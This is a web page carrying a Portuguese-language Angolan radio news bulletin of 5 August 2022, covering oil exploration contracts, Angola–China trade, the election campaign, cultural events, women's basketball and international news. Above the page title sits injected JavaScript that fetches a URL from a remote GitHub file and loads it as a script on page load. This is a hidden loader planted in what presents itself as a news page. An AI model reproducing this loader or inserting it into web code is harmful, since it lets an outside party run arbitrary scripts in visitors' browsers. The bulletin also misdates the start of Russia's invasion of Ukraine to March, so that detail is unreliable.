;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Noticias ao almoço, edição de 05 de Agosto de 2022 | RadioPlayDigital
Noticias ao almoço, edição de 05 de Agosto de 2022

ANPG assina contratos para exploração onshore de oito blocos.

Trocas comerciais entre Angola e a China atingem 23,35 mil milhões de dólares.

1º de Agosto e Interclube começam amanhã disputa do título  Campeonato Nacional sénior feminino em basquetebol

China anuncia sanções a Nancy Pelosi após visita a Taiwan

Ponto

Hoje é sexta-feira, doa 05 de Agosto de 2022. O Faustino Diogo edita as notícias com técnica de, Alexandre Campos e final de emissão de, Emanuel Catilina. Ao microfone estou eu, Sílvio de Abreu.

Ponto

Boa Tarde,

A Agência Nacional de Petróleo, Gás e Bio-combustíveis (ANPG) assinou, em Luanda, oito contratos de exploração dos blocos da Bacia do Congo e Kwanza.

Segundo o PCA da ANPG, Paulino Jerónimo, os acordos rubricados inserem-se na materialização da estratégia geral da empresa, com base num diagnóstico ao sector dos petróleos.

Paulino Jerónimo reiterou o compromisso da concessionária nacional, em aumentar o conhecimento geológico das bacias de Angola, através da implementação da estratégia de exploração de hidrocarbonetos,  promover e licitar essas áreas, incrementando, em caso de sucesso, a producão petrolífera.  

Anunciou que no próximo ano será feita a licitação de mais blocos da zona terrestre das Bacias do Baixo Congo e do Kwanza e que continuam disponíveis para concessionárias petrolíferas da zona terrestre do Kwanza outros blocos

O  Secretário de Estado para o Petróleo e Gás, José Barroso, considerou  que estes oito contratos de exploração enquadram-se na política de desenvolvimento do sector.

RD – JBarroso

Secretário de Estado para o Petróleo e Gás, José Barroso.

Por sua vez, o PCA da Prodoil, Pedro Godinho, espera que estes contratos reforcem a produção petrolífera nacional.

RD – PGodinho.

PCA da Prodoil, Pedro Godinho.

ANPG assinou, em Luanda, oito contratos de exploração dos blocos da Bacia do Congo e Kwanza.

As trocas comerciais entre Angola e a China tiveram um crescimento de 42 porcento em 2021, em termos homólogos, atingindo 23,35 mil milhões de dólares, anunciou, o embaixador chinês acreditado no nosso país.

Segundo Gong Tao, as trocas comerciais chegaram já aos 14,42 mil milhões de dólares, no primeiro semestre deste ano, afirmando que o comércio se manteve a bom ritmo nos primeiros seis meses de 2022, com aumento homólogo de 33 porcento, continuando a China a ser o principal parceiro económico de Angola.

O diplomata revelou que está em negociação a isenção de tarifas alfandegárias para as exportações angolanas para a China, que são liderados pelo petróleo, seguindo-se as rochas ornamentais.

O Centro de Ciências de Luanda, em construção na baixa da capital, pode abrir as portas ao público em Julho do próximo ano, anunciou o director do Gabinete de Obras Especiais (GOE), Leonel Cruz.

A informação foi prestada durante uma visita que o Presidente da República, João Lourenço, realizou ontem à empreitada, que está a ser instalada na antiga fábrica de sabão, no Largo do Baleizão.

No final da visita, a ministra do ensino superior, ciência, tecnologia e inovação Maria do Rosário Sambo, falou dos principais objectivos do centro, que tem quase tudo pronto para entrar em funcionamento.

Cinquenta milhões de dólares é o valor do investimento que transformou uma antiga fábrica de sabão no centro de ciência.

….

RD-MRSambo 1

A ministra apontou outras valências da estrutura que terá um papel fundamental para a componente prática.

RD-MRSambo 2

Ministra do ensino superior, ciência, tecnologia e inovação, Maria do Rosário Sambo, e o Centro de Ciências de Luanda que deverá estar aberto no próximo ano.

Ponto

E numa altura em que faltam dezanove dias para as quintas eleições gerais, os oito partidos concorrentes intensificam a campanha pelas cidades, ruas e aldeias do país.

Hoje o secretário-geral do MPLA, Paulo Pombolo, presidiu um acto de massas na província do Zaire.

Em Luanda, as acções dos camaradas centra-se no diálogo com os cidadãos.

A UNITA diz que viu-se obrigada a interromper, uma marcha que realizava ontem no município de Viana, no quadro da campanha eleitoral, por motivos de segurança.

O partido optou por suspender a sua actividade, após verificar a presença de efectivos da polícia de guarda fronteira armados, entre os militantes que participavam da marcha.

Uma situação confirmada e lamentada pelo Secretário Provincial da UNITA em Luanda, Nelito Ekuikui.

O número um da UNITA na Capital diz que o seu partido quer uma campanha eleitoral com liberdade e sem situações embaraçosas.

RD-NEkuikui

Secretário Provincial da UNITA em Luanda, Nelito Ekuikui.

O maior partido na oposição diz que teve de interromper marcha de campanha em Viana, devido a presença de agentes armados da polícia nacional.

Procuramos contactar o comando provincial da polícia nacional em Luanda, para um esclarecimento, mas não obtivemos sucesso

….

A líder do Partido Humanista de Angola (PHA), Florbela Malaquias, desenvolve campanha na  província da Lunda Norte, onde discursou para militantes e populares na cidade do Dundo, município do Chitato.

Bela Malaquias prometeu aos cidadãos que terão maior proveito do brilho dos diamantes, explorados naquela região.

A única mulher candidata a presidência da república ouviu as queixas das mulheres sobre alegadas violações por parte efectivos da polícia de fronteira naquela região.

….

RD-FMalaquias

A campanha a leste de Florbela Malaquias

No Huambo, o apelo é para discursos menos inflamatórios, como nos conta o repórter Justino Leandro.

RD – JLeandro

Repórter Justino Leandro

Publicidade

O presidente da República, João Lourenço foi hoje ao Quartel General do Exèrcito, ex R20,em Luanda, prestar a última homenagem ao general, Jorge Manuel dos Santos “Sukissa”, comandante da Marinha de Guerra de Angola.

Sukissa morreu no domingo, em Luanda, vítima de doença.

O apresentador, actor, escritor, diretor e humorista brasileiro Jô Soares morreu esta sexta-feira, aos 84 anos. Considerado um dos maiores humoristas do Brasil, o apresentador do “Programa do Jô”, exibido na TV Globo de 2000 a 2016, estava internado desde 28 de Julho no Hospital Sírio-Libanês, na região central de São Paulo, onde deu entrada para tratar de uma pneumonia.

Ponto

A décima oitava edição do campo nacional de férias dos estudantes universitários terminou em Luanda (CAMFEU).

No encerramento, o vice-governador de Luanda, Dionísio Da Fonseca, apelou a juventude a usufruir do potencial que representa a Capital para novos desafios.

RD – DFonseca

Vice-governador de Luanda, Dionísio da Fonseca.

E Crispiniano dos santos, secretário nacional da JMPLA ressaltou a importância dos jovens votarem para o desenvolvimento que se pretende do País.

RD – CSantos

Crispiniano dos Santos, secretário nacional da JMPLA, quando falava no encerramento da décima oitava edição campo nacional de férias dos estudantes universitários, que decorreu em Luanda.

A próxima edição acontece na província do Huambo.

Ponto

A Décima Oitava Edição do Festival Internacional de Banda Desenhada Luanda Cartoon arranca hoje, com o tema “Aquecimento Global”.

O evento é promovido pelo Camões-Centro Cultural Português em Luanda, em parceria com os estúdios Olindomar.

Delfina Bastos a porta-voz do festival falou à LAC sobre as motivações para a escolha do tema aquecimento global

RD-DBastos 2

O Luanda Cartoon faz dezoito anos, daí que serão homenageados 18 artistas, como ressalta Delfina Bastos.

RD-DBastos 1

E a propósito da inclusão do tema aquecimento global no festival de banda desenhada, o ambientalista Vladimir Russo, considera positiva a iniciativa.

RD-VRusso

Ambientalista Vladimir Russo e a relevância do tema Aquecimento Global no Festival Internacional de Banda Desenhada Luanda Cartoon, que começa hoje.

E a sede da União dos Escritores Angolanos acolhe hoje à partir das catorze horas uma sessão conjunta de lançamento, autógrafos e debate de dois livros.

A obra “Pecados Mortais no ensino, na avaliação e na aprendizagem . Reflexões Para as Mudanças Necessárias” é da autoria do investigador e professor universitário, Manuel Afonso, que explicou em linhas gerais à LAC a essência do livro.

RD-MAfonso

A outra obra que chega ao público intitulada “Poderes Abusivos. As avarias de um país em auto destruição assistida é da autoria do sociólogo e investigador, João Milando que também falou à LAC.

RD-JMilando

Sociólogo e investigador, João Milando que na União dos Escritores Angolanos um livro.

Em simultâneo será lançada outro livro da autoria do investigador Manuel Afonso.

Ponto

No desporto,

1º de Agosto e Interclube disputam o play-off da final da trigésima sétima edição do Campeonato Nacional sénior feminino de basquetebol, a partir de amanhã, às18 horas, a melhor de cinco partidas.

Militares” e “polícias” reeditam a final do ano passado com o mesmo objectivo. A equipa de Walter Costa busca a revalidação e, do lado contrário, Carlos Diniz quer recuperar o título perdido.

O terceiro e quarto lugar desta prova estará em disputa entre  às Formigas do Cazenga e 1º de Agosto Academia.

Ponto

Da actualidade Internacional,

A China acaba de anunciar sanções à Presidente da Câmara dos Estados Unidos Nancy Pelosi e aos seus familiares mais próximos após a sua viagem a Taiwan, de acordo com uma declaração, relatada a Bloomberg News.

De acordo com um porta-voz do Ministério dos Negócios Estrangeiros chinês, citado pela Reuters, “apesar das sérias preocupações e da firme oposição da China, Pelosi insistiu em visitar Taiwan, interferindo seriamente nos assuntos internos da China, minando a soberania e integridade territorial da China, espezinhando a política de uma só China, e ameaçando a paz e estabilidade do Estreito de Taiwan”.

Os signatários do acordo de paz para terminar com a guerra no Sudão do Sul voltaram a adiar as primeiras eleições no país desde a independência, para Dezembro de 2024, prolongando o período de transição por dois anos.

Os Estados Unidos da América, Reino Unido e Noruega avisaram numa carta ao Presidente Salva Kiir, pouco antes do anúncio hoje do adiamento das eleições, que não enviariam os seus principais diplomatas porque acreditavam que nem todas as partes do acordo de paz tinham sido consultadas.

Três novos barcos de transporte de cereais  partem hoje dos portos da Ucrânia, informou o ministro da Defesa da Turquia, Hulusi Akar, citado pela agência estatal de notícias do país, a Anadolu.

A saída dos três navios surge na sequência  do trabalho do centro de coordenação conjunta”, afirmou o ministro, sem especificar os portos de onde irão partir os navios.

O primeiro carregamento de cereais exportados pela Ucrânia desde o início da invasão russa, em 24 de março, partiu há  quatro dias, do porto de Odessa.

Após uma inspeção efetuada dois dias depois, em Istambul, por especialistas turcos, russos e ucranianos, prosseguiu a sua viagem rumo ao Líbano.

 

 

 

Data de Emissão: 05-08-2022 às 12:30
Género(s): Noticiário
 

Relacionados